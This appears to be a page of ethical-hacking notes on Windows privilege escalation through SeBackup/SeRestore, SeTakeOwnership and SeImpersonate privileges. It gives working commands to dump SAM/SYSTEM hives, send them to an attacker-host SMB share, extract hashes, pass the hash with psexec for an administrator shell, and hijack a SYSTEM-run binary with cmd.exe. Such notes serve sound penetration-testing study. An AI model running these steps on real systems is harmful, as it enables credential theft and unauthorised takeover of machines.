Abusing privileges

To view the privileges of the current user:

C:\> whoami /priv

SeBackup / SeRestore

The impacket tool can be used to perform various tasks such as starting a SMB server, dumping secrets from hives in the Windows registry, and running commands with psexec, among many others.

Refer to my impacket notes for more information:

Logoimpacket | Penetration testing/ethical hacking

Suppose we have gained a remote shell on a server with the SeBackUp and SeRestore privileges

C:\target> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled

Due to the set privileges, we are able to save the contents of the SAM and SYSTEM hive registry to a location of our choice (C:\Users\jarrett\system.hive and C:\Users\jarrett\sam.hive in this case):

C:\target> reg save hklm\system C:\Users\jarrett\system.hive
C:\target> reg save hklm\sam C:\Users\jarrett\sam.hive

The command below starts a simple SMB server on the attacker machine with a network share named public pointing to the share directory. This allows us to transfer the files from the target machine to the attacker at a particular share point (share folder).

Attacker machine

attacker@attacker_ip:~$ impacket-smbserver -smb2support -username jarrett -password mynamejeff public share

The command below copies the content of system.hive and sam.hive at the specified directory to the share point on the attacker machine.

Target machine

C:\target> copy c:\users\jarrett\system.hive \\<attacker_ip>\public\
C:\target> copy c:\users\jarrett\sam.hive \\<attacker_ip>\public\

The next few commands should be ran from the attacker machine

The command below dumps the hashes from the sam.hiveand system.hivefiles present on the current folder (specified by the LOCAL target option).

attacker@attacker_ip:~/share$ ls 
sam.hive system.hive

attacker@attacker_ip:~/share$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket vxxx - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...:::
Guest:xxx:xxx:xxx::
Administrator:xx12xx:xx34xx::
...

The command below uses the hashes found from the impacket-secretsdump command above, to authenticate as the administrator user. This provides us with a remote shell as the administrator user on the target Windows machine

attacker@attacker_ip:~/share$ impacket-psexec -hashes xx12xx:xx34xx administrator@10.10.x.x
...

C:\Windows\system32>

SeTakeOwnership

This permission allows a user to take ownership of any object on the system, including files and registry keys. 

C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
...

Suppose we have found a service on the target system that executes an.exefile with SYSTEM privileges (an example would be utilman.exe). Let's name that file rand.exe. Due to our SeTakeOwnership privilege, we are able to take ownership of that file with the command below:

C:\> takeown /f C:\Windows\System32\priv.exe

At this point, we are able to provide ourselves any privileges we need over the file. The command below gives our current user (jarrett) full access(F)to the priv.exe file at the specified location.

C:\> icacls C:\Windows\System32\priv.exe /grant jarrett:F

Finally, we can copy any file of choice to the target file we have full access to:

Take note to be in the correct file directory when using the terminal, or optionally provide the correct path

The command below copies the cmd.exe file topriv.exe:

C:\Windows\System32\> copy cmd.exe priv.exe

This provides us with a command prompt with SYSTEM privileges whenever the particular service mentioned above is started.

LogotakeownMicrosoftLearn

SeImpersonate / SeAssignPrimaryToken

  • SeImpersonate: Privilege that allows a user to impersonate another user’s security context

  • SeAssignPrimaryToken: Privilege that allows assignments of a new security token to a process. This allows that process to impersonate a higher-privileged user (such as SYSTEM).

Breakdown of how the RogueWinRM exploit tool works (As of time of writing, I wasn't able to find a comprehensive technical guide on how it works. However, I have pieced together the key points from research on the main concepts involved in this exploit):

  1. The Background Intelligent Transfer Service (BITS) is started, which automatically initiates a connection to port 5985 (used by WinRM) using SYSTEM privileges.

    • Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network.

    • The SYSTEM-level authentication credentials can be captured from the above-mentioned connection to WinRM on the local target machine (port 5985)

  2. The captured authentication credentials can be used to execute a malicious payload of choice (specified as argument to the RogueWinRM tool) with SYSTEM-level privileges. This is due the SeImpersonate and SeAssignPrimaryToken privileges being set on the user on the target machine

    • A reverse shell connection can be established to a remote attacker server, essentially providing a SYSTEM-level shell

LogoGitHub - antonioCoco/RogueWinRM: Windows Local Privilege Escalation from Service Account to SystemGitHub
LogoBackground Intelligent Transfer Service - Win32 appsdocsmsft
BITS service

Windows privileges to admin list

LogoGitHub - gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.GitHub
PreviousInsecure service permissionNextIntroduction

Last updated